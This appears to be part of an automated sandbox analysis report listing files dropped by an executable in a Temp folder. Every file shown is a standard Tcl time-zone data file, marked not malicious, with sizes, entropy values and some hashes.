                                                                                                                                                                                                                                                    Entropy (8bit):4.944898590958793
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Galapagos) {. {-9223372036854775808 -21504 0 LMT}. {-1230746496 -18000 0 ECT}. {504939600 -21600 0 GALT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):150
                                                                                                                                                                                                                                                    Entropy (8bit):4.980881214713058
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Gambier) {. {-9223372036854775808 -32388 0 LMT}. {-1806678012 -32400 0 GAMT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):151
                                                                                                                                                                                                                                                    Entropy (8bit):4.94737487926159
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Guadalcanal) {. {-9223372036854775808 38388 0 LMT}. {-1806748788 39600 0 SBT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):204
                                                                                                                                                                                                                                                    Entropy (8bit):4.833752908914461
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Guam) {. {-9223372036854775808 -51660 0 LMT}. {-3944626740 34740 0 LMT}. {-2177487540 36000 0 GST}. {977493600 36000 0 ChST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):302
                                                                                                                                                                                                                                                    Entropy (8bit):4.60985382453312
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Honolulu) {. {-9223372036854775808 -37886 0 LMT}. {-2334101314 -37800 0 HST}. {-1157283000 -34200 1 HDT}. {-1155436200 -37800 0 HST}. {-880198200 -34200 1 HDT}. {-765376200 -37800 0 HST}. {-712150200 -36000 0 HST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):188
                                                                                                                                                                                                                                                    Entropy (8bit):4.795254976384326
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Honolulu)]} {. LoadTimeZoneFile Pacific/Honolulu.}.set TZData(:Pacific/Johnston) $TZData(:Pacific/Honolulu).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):212
                                                                                                                                                                                                                                                    Entropy (8bit):4.792256891473366
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Kiritimati) {. {-9223372036854775808 -37760 0 LMT}. {-2177415040 -38400 0 LINT}. {307622400 -36000 0 LINT}. {788954400 50400 0 LINT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):204
                                                                                                                                                                                                                                                    Entropy (8bit):4.850978033001401
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Kosrae) {. {-9223372036854775808 39116 0 LMT}. {-2177491916 39600 0 KOST}. {-7988400 43200 0 KOST}. {915105600 39600 0 KOST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):206
                                                                                                                                                                                                                                                    Entropy (8bit):4.857886519292782
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Kwajalein) {. {-9223372036854775808 40160 0 LMT}. {-2177492960 39600 0 MHT}. {-7988400 -43200 0 KWAT}. {745848000 43200 0 MHT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):173
                                                                                                                                                                                                                                                    Entropy (8bit):4.877232573489241
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Majuro) {. {-9223372036854775808 41088 0 LMT}. {-2177493888 39600 0 MHT}. {-7988400 43200 0 MHT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):152
                                                                                                                                                                                                                                                    Entropy (8bit):5.003270425254343
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Marquesas) {. {-9223372036854775808 -33480 0 LMT}. {-1806676920 -34200 0 MART}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):189
                                                                                                                                                                                                                                                    Entropy (8bit):4.763101291800624
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Pago_Pago)]} {. LoadTimeZoneFile Pacific/Pago_Pago.}.set TZData(:Pacific/Midway) $TZData(:Pacific/Pago_Pago).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):231
                                                                                                                                                                                                                                                    Entropy (8bit):4.69970338626088
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Nauru) {. {-9223372036854775808 40060 0 LMT}. {-1545131260 41400 0 NRT}. {-877347000 32400 0 JST}. {-800960400 41400 0 NRT}. {294323400 43200 0 NRT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):205
                                                                                                                                                                                                                                                    Entropy (8bit):4.766990097413265
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Niue) {. {-9223372036854775808 -40780 0 LMT}. {-2177412020 -40800 0 NUT}. {-599575200 -41400 0 NUT}. {276089400 -39600 0 NUT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):262
                                                                                                                                                                                                                                                    Entropy (8bit):4.702647997151218
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Norfolk) {. {-9223372036854775808 40312 0 LMT}. {-2177493112 40320 0 NMT}. {-599656320 41400 0 NFT}. {152029800 45000 1 NFST}. {162912600 41400 0 NFT}. {1443882600 39600 0 NFT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):317
                                                                                                                                                                                                                                                    Entropy (8bit):4.558916369175064
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Noumea) {. {-9223372036854775808 39948 0 LMT}. {-1829387148 39600 0 NCT}. {250002000 43200 1 NCST}. {257342400 39600 0 NCT}. {281451600 43200 1 NCST}. {288878400 39600 0 NCT}. {849366000 43200 1 NCST}. {857228400 39600 0 NCT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):239
                                                                                                                                                                                                                                                    Entropy (8bit):4.78434938607457
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X5XevJm2OH23ePuneYCWZv5cIlvK8KlvvL:MBp5GJmdH2uPTYCM/lslHL
                                                                                                                                                                                                                                                    MD5:7B3D2465AE05BF4D898C0983769C1247
                                                                                                                                                                                                                                                    SHA1:66F41D875B55B97282B0B031B37CE31932FD506A
                                                                                                                                                                                                                                                    SHA-256:9098D53C778400ADE89B532489729F0EF2E5472E78372CE3B066F9DCBB8BBBC5
                                                                                                                                                                                                                                                    SHA-512:DBF67F9A69D7EBF6F696FF9C947D17F77578439FC0ACEE5ECCB90A2EC917EFECF3CADDA46836C2B8206E585EB68585AFCF0A074FA1CC3D7F6791FB84F47FD291
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Pago_Pago) {. {-9223372036854775808 45432 0 LMT}. {-2855738232 -40968 0 LMT}. {-1861879032 -39600 0 NST}. {-86878800 -39600 0 BST}. {439038000 -39600 0 SST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):145
                                                                                                                                                                                                                                                    Entropy (8bit):4.926225749796432
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5nUDHugEZFwcXGm2OHCAnvXmdQ4+vY:SlSWB9X5Xg2wTm2OHPnPmdQRvY
                                                                                                                                                                                                                                                    MD5:39822D6A510FEF24D476D12C61D3EED6
                                                                                                                                                                                                                                                    SHA1:7E60BA857738EFDB4EE3303F1BA1CB8028D3549F
                                                                                                                                                                                                                                                    SHA-256:9F0C8FD0A47D561E7198F2935482B873039D6E36DB2E9435E89CD4663F08F9F8
                                                                                                                                                                                                                                                    SHA-512:7D19E2B0CB7460323D25CCEA60208EBDF944448E25C83E8AF6C063E3213739A35CA28FA657E70E69510255F07BBA4B8FB101E766EEAFC8D7B957AE029804D6EC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Palau) {. {-9223372036854775808 32276 0 LMT}. {-2177485076 32400 0 PWT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                    Entropy (8bit):4.856366586274156
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5nUDHuQTWLMWkXGm2OHUVFvvXmXUlglSFycyf/vHvYvn:SlSWB9X5XQyLMCm2OHUVVPmXUKEEhf/y
                                                                                                                                                                                                                                                    MD5:007CAABA7DF754D780A221DEA81C2BF7
                                                                                                                                                                                                                                                    SHA1:E2A58CCEF4A5425CB7197D5F7D7982F8A970AB3F
                                                                                                                                                                                                                                                    SHA-256:73024A9A7CCFAEE298560C4B857288C46C4A3F643141A09457922D9C6E7771AB
                                                                                                                                                                                                                                                    SHA-512:27FD492D7AE74832493505B2AAE3645D86E185E16E7A36EE747C0340619BD0A4CC042D613C92FF636807826B2F3BB2D80F0925DC240835298E2CDE0F66287515
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Pitcairn) {. {-9223372036854775808 -31220 0 LMT}. {-2177421580 -30600 0 PNT}. {893665800 -28800 0 PST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):148
                                                                                                                                                                                                                                                    Entropy (8bit):4.981615890085678
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5nUDHuy3EXGm2OH1/VvXmcruL:SlSWB9X5Xybm2OH1NPmS6
                                                                                                                                                                                                                                                    MD5:F931DC5DDDE5DA4DA24249DED18038C4
                                                                                                                                                                                                                                                    SHA1:77BDDB2AD825452476D1A237C4EB4434DB33BEC6
                                                                                                                                                                                                                                                    SHA-256:7A09D415E802BA784A04995023FF191D1406598C66E8D49F1AA9653B6C66E8E6
                                                                                                                                                                                                                                                    SHA-512:F43F57375E414AFA35511B8751C756555FE33346A75159C171C977EBE80E2561C161B57DDFF912C56D66B935A14383693F1F253FF98779C2B7AC3A808211A234
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Pohnpei) {. {-9223372036854775808 37972 0 LMT}. {-2177490772 39600 0 PONT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):183
                                                                                                                                                                                                                                                    Entropy (8bit):4.735143778298082
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqTQGuySedVAIgObTuyvQnUDHu3HppUDHuyu:SlSWB9IZaM3yciySedVAIgObiyvQX3HP
                                                                                                                                                                                                                                                    MD5:C963ECC06914E8E42F0B96504C1F041C
                                                                                                                                                                                                                                                    SHA1:82D256793B22E9C07362708EE262A6B46AC13ACD
                                                                                                                                                                                                                                                    SHA-256:86593D3A9DC648370A658D82DA7C410E26D818DB2749B79F57A802F8CED76BD3
                                                                                                                                                                                                                                                    SHA-512:0F3691977F992A3FF281AD1577BA0BD4AAF7DB3F167E1A1FF139374C14B14F1A456BE7E7D362D698A8294A6AB906E69AC56E1EE0DAF77C13050553299FB6DAF5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Pohnpei)]} {. LoadTimeZoneFile Pacific/Pohnpei.}.set TZData(:Pacific/Ponape) $TZData(:Pacific/Pohnpei).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):183
                                                                                                                                                                                                                                                    Entropy (8bit):4.910245509007629
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5nUDHuwKXI3EXGm2OHwdvvXZUeQTnoowFZnqMVV3rvYvn:SlSWB9X5X/43Lm2OHwdvPZZQTnoDZDVA
                                                                                                                                                                                                                                                    MD5:81139518ED3656B435EB868FB7686201
                                                                                                                                                                                                                                                    SHA1:B80007B5DF07104F4FF01BF75D26647DF8D48932
                                                                                                                                                                                                                                                    SHA-256:1619743B030B8E98B50B5DA732FF05F4AAF749C440914671186A0DF63A3DEDCB
                                                                                                                                                                                                                                                    SHA-512:B8EC6D5A6B0214713896E4CFD1DB34BD129B416D6FB230AE4808E0BC63F19C6464C576D7F7C68A5D90D89EC96829F5A0972E5A86B584F2A684257686E576B4F8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Port_Moresby) {. {-9223372036854775808 35320 0 LMT}. {-2840176120 35312 0 PMMT}. {-2366790512 36000 0 PGT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):931
                                                                                                                                                                                                                                                    Entropy (8bit):4.17207356431605
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp5VrsmdHAPS+GT0OvyXHghNFID8KnEUo8+If2aUqoYA+IokXj7VU/rOJzVovD8:ccekSh0oNFmNLR+4A/BO8
                                                                                                                                                                                                                                                    MD5:AF517E0BF0AE91439ED8F72503A5534C
                                                                                                                                                                                                                                                    SHA1:5A4376BA8CBBE50F29DEF952EC4D424E45EF72D9
                                                                                                                                                                                                                                                    SHA-256:01506284169D88C126B4614805E127EED4A46B40E29ED542FC52840330013ABF
                                                                                                                                                                                                                                                    SHA-512:4630C31EEFA40AB09480D36EF676F0A3BA9228FD4B91E1BF9E64A316EBEFF1D51674BE24E2973DADD2D2626A08AE564DCF4742CFBC04F359D8CA7AC782D32D26
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Rarotonga) {. {-9223372036854775808 -38344 0 LMT}. {-2177414456 -37800 0 CKT}. {279714600 -34200 0 CKHST}. {289387800 -36000 0 CKT}. {309952800 -34200 1 CKHST}. {320837400 -36000 0 CKT}. {341402400 -34200 1 CKHST}. {352287000 -36000 0 CKT}. {372852000 -34200 1 CKHST}. {384341400 -36000 0 CKT}. {404906400 -34200 1 CKHST}. {415791000 -36000 0 CKT}. {436356000 -34200 1 CKHST}. {447240600 -36000 0 CKT}. {467805600 -34200 1 CKHST}. {478690200 -36000 0 CKT}. {499255200 -34200 1 CKHST}. {510139800 -36000 0 CKT}. {530704800 -34200 1 CKHST}. {541589400 -36000 0 CKT}. {562154400 -34200 1 CKHST}. {573643800 -36000 0 CKT}. {594208800 -34200 1 CKHST}. {605093400 -36000 0 CKT}. {625658400 -34200 1 CKHST}. {636543000 -36000 0 CKT}. {657108000 -34200 1 CKHST}. {667992600 -36000 0 CKT}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):174
Entropy (8bit):4.8048918219164065
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Guam)]} {. LoadTimeZoneFile Pacific/Guam.}.set TZData(:Pacific/Saipan) $TZData(:Pacific/Guam).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):188
Entropy (8bit):4.729839728044672
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Pago_Pago)]} {. LoadTimeZoneFile Pacific/Pago_Pago.}.set TZData(:Pacific/Samoa) $TZData(:Pacific/Pago_Pago).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):149
Entropy (8bit):4.950599400810649
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Tahiti) {. {-9223372036854775808 -35896 0 LMT}. {-1806674504 -36000 0 TAHT}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):147
Entropy (8bit):4.948761121694915
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Tarawa) {. {-9223372036854775808 41524 0 LMT}. {-2177494324 43200 0 GILT}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):379
Entropy (8bit):4.418587216893832
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Tongatapu) {. {-9223372036854775808 44360 0 LMT}. {-2177497160 44400 0 TOT}. {-915193200 46800 0 TOT}. {915102000 46800 0 TOT}. {939214800 50400 1 TOST}. {953384400 46800 0 TOT}. {973342800 50400 1 TOST}. {980596800 46800 0 TOT}. {1004792400 50400 1 TOST}. {1012046400 46800 0 TOT}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):175
Entropy (8bit):4.865414495402954
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Chuuk)]} {. LoadTimeZoneFile Pacific/Chuuk.}.set TZData(:Pacific/Truk) $TZData(:Pacific/Chuuk).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):145
Entropy (8bit):4.971563080524748
Encrypted:false
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Wake) {. {-9223372036854775808 39988 0 LMT}. {-2177492788 43200 0 WAKT}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):146
Entropy (8bit):4.948108895609242
Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Wallis) {. {-9223372036854775808 44120 0 LMT}. {-2177496920 43200 0 WFT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):174
                                                                                                                                                                                                                                                    Entropy (8bit):4.887747451136248
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Chuuk)]} {. LoadTimeZoneFile Pacific/Chuuk.}.set TZData(:Pacific/Yap) $TZData(:Pacific/Chuuk).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):169
                                                                                                                                                                                                                                                    Entropy (8bit):4.89278153269951
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Warsaw)]} {. LoadTimeZoneFile Europe/Warsaw.}.set TZData(:Poland) $TZData(:Europe/Warsaw).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):171
                                                                                                                                                                                                                                                    Entropy (8bit):4.887895128079745
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Lisbon)]} {. LoadTimeZoneFile Europe/Lisbon.}.set TZData(:Portugal) $TZData(:Europe/Lisbon).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):160
                                                                                                                                                                                                                                                    Entropy (8bit):4.743612967973961
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Taipei)]} {. LoadTimeZoneFile Asia/Taipei.}.set TZData(:ROC) $TZData(:Asia/Taipei).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):157
                                                                                                                                                                                                                                                    Entropy (8bit):4.851755466867201
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Seoul)]} {. LoadTimeZoneFile Asia/Seoul.}.set TZData(:ROK) $TZData(:Asia/Seoul).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):175
                                                                                                                                                                                                                                                    Entropy (8bit):4.80663340464643
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Singapore)]} {. LoadTimeZoneFile Asia/Singapore.}.set TZData(:Singapore) $TZData(:Asia/Singapore).
